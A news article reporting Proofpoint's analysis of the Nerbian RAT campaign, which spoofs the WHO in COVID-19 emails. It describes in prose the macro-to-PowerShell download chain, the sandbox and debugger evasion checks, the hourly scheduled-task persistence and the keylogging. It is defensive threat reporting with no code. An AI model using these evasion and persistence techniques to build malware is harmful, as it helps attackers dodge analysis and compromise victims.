Researchers at cybersecurity vendor Proofpoint have analysed a new remote access Trojan (RAT) malware campaign using sophisticated evasion techniques and leveraging COVID-19 themed messaging to target global organisations.
The malware, dubbed “Nerbian RAT” and written in the Go programming language, uses significant anti-analysis and anti-reversing capabilities and open-source Go libraries to conduct malicious activities, the researchers stated.
The campaign was first analysed by Proofpoint in late April. In a statement, Proofpoint vice president of Threat Research and Detection, Sherrod DeGrippo, said the research demonstrates how malware authors continue to operate at the intersection of open-source capability and criminal opportunity.
Low-volume RAT malware spoofs WHO, leverages COVID-19 pandemic
Starting on April 26, 2022, Proofpoint researchers observed a low-volume malware campaign targeting multiple industries with emails claiming to be representing the World Health Organisation (WHO) sharing important information regarding COVID-19.
The emails included an attached Word document containing macros that, when opened, revealed information relating to COVID-19 safety, self-isolation, and caring for individuals.
“Interestingly, the lure is similar to themes used in the early days of the pandemic in 2020, specifically spoofing the WHO to distribute information about the virus,” the researchers wrote. The documents also contain logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI), Proofpoint added.
Nerbian RAT demonstrates macro-enabled attack path, code re-use
When the macros are enabled, the document executes an embedded macro that drops a .bat file which performs a PowerShell invoke web request (IWR) and renames the downloaded file to UpdateUAV.exe before dropping it into a victim’s hard drive, the researchers said.
“UpdateUAV.exe is the payload initially downloaded from the malicious Word document. It is a 64-bit executable, written in Golang, 3.5MB in size, and UPX packed,” they wrote. “Likely, this malware is packed with UPX to reduce the overall size of the executable being downloaded. Unpacked, the file is 6.6MB in total.”
Proofpoint named this malware “Nerbian RAT” based on one of the function names in the dropper. Researchers noted that the UpdateUAV executable features significant code re-use, with strings referencing various GitHub projects.
Nerbian RAT’s sophisticated evasion techniques
Nerbian RAT demonstrates several sophisticated evasion techniques, Proofpoint said. For example, the dropper will stop execution upon encountering certain conditions, including if:
- The size of the hard disk on the system is less than 100GB.
- The name of the hard disk contains virtual, vbox or vmware strings.
- The MAC address queried returns certain OUI values.
- Specific reverse engineering/debugging programs are present.
- exe, RAMMap.exe, RAMMap64.exe, or vmmap.exe memory analysis/memory tampering programs are present.
In addition to the anti-reversing checks, Proofpoint identified other anti-analysis checks present in the binary including:
- Use of IsDebuggerPresent API to determine if the executable is being debugged
- Queries for the following network interface names: Intel PRO/1000 MT Network Connection, Loopback Pseudo-Interface 1, and Software Loopback Interface 1
Malware demonstrates ability to log keystrokes, communicates over SSL
If enablement is achieved, the dropper will then attempt to establish a scheduled task named MicrosoftMouseCoreWork to start the RAT payload hourly to establish persistence, Proofpoint said.
“The dropper’s end-goal is to download the executable named SSL, save it as MoUsoCore.exe, and configure a scheduled task to run it hourly as its primary persistence mechanism.”
Nerbian RAT also appears to have a variety of different functions including the ability to log keystrokes and, like most modern malware families, prefers to handle its communications over SSL, Proofpoint continued.
“Despite all this complexity and care being taken to protect the data in transit and “vet” the compromised host, the dropper and the RAT itself do not employ heavy obfuscation outside of the sample being packed with UPX, which it can be argued isn’t necessarily for obfuscation, but to simply reduce the size of the executable,” Proofpoint researchers concluded.
“Additionally, much of the functionality of both the RAT and the dropper are easy to infer due to the strings referring to GitHub repositories.”